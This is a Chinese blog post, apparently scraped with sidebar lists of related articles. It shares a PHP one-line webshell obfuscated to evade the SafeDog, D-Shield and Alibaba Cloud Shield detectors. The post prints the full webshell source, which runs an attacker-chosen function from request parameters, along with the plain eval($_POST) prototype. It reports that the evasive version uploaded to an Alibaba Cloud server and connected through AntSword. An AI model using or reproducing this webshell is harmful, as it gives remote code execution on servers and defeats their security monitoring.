PHP 一句话木马
前言php
在测试某网站时,发现为阿里云服务器,上传的一句话均被kill掉,因而搞了个过web安全狗,D盾,云盾的一句话木马,在此分享出来。web
正文安全
一句话源码:服务器
1 <?php 2 class a{ 3 public function __construct(){ 4 $this->a = $_REQUEST['a']; 5 } 6 public function get(){ 7 $a = $this->a; 8 return $a; 9 } 10 } 11 $func = new a; 12 # call_user_func_array($func->get(),$_REQUEST['b']); 13 $params = $_REQUEST['b']; 14 function callback($a,$b){ 15 $a($b); 16 } 17 callback($func->get(),$params);
WEB安全狗 V4.0:函数
D盾:web安全
若是一句话中使用 call_user_func_array 作回调函数的话会产生级别2:测试
阿里云盾:网站
首先上传一个一句话木马原型:<?php eval($_POST['xxx'])?>this
能够看到被检测出,在上传过狗一句话:阿里云
能够看到阿里云一句话使用蚁剑链接成功。
最后
其实一句话想过狗并无想象中的那么难,总之就是将简单的事情复杂化,经过各类手段执行一句话原型便可。
相关文章
- 1. CTF-PHP一句话木马
- 2. php一句话木马
- 3. PHP一句话木马
- 4. 一句话木马,小马,大马,混淆一句话木马
- 5. PHP一句话木马小总结与SQL语句写一句话木马
- 6. 一句话木马
- 7. 一句话木马记录
- 8. 一句话木马(蚁剑)
- 9. 一句话木马+菜刀
- 10. 关于php一句话木马
- 更多相关文章...
- • ionic 对话框 - ionic 教程
- • 一对一关联查询 - MyBatis教程
- • PHP开发工具
- • RxJava操作符(一)Creating Observables
相关标签/搜索
每日一句
-
每一个你不满意的现在,都有一个你没有努力的曾经。
最新文章
- 1. js中 charCodeAt
- 2. Android中通过ViewHelper.setTranslationY实现View移动控制(NineOldAndroids开源项目)
- 3. 【Android】日常记录:BottomNavigationView自定义样式,修改点击后图片
- 4. maya 文件检查 ui和数据分离 (一)
- 5. eclipse 修改项目的jdk版本
- 6. Android InputMethod设置
- 7. Simulink中Bus Selector出现很多? ? ?
- 8. 【Openfire笔记】启动Mac版Openfire时提示“系统偏好设置错误”
- 9. AutoPLP在偏好标签中的生产与应用
- 10. 数据库关闭的四种方式
欢迎关注本站公众号,获取更多信息
相关文章
- 1. CTF-PHP一句话木马
- 2. php一句话木马
- 3. PHP一句话木马
- 4. 一句话木马,小马,大马,混淆一句话木马
- 5. PHP一句话木马小总结与SQL语句写一句话木马
- 6. 一句话木马
- 7. 一句话木马记录
- 8. 一句话木马(蚁剑)
- 9. 一句话木马+菜刀
- 10. 关于php一句话木马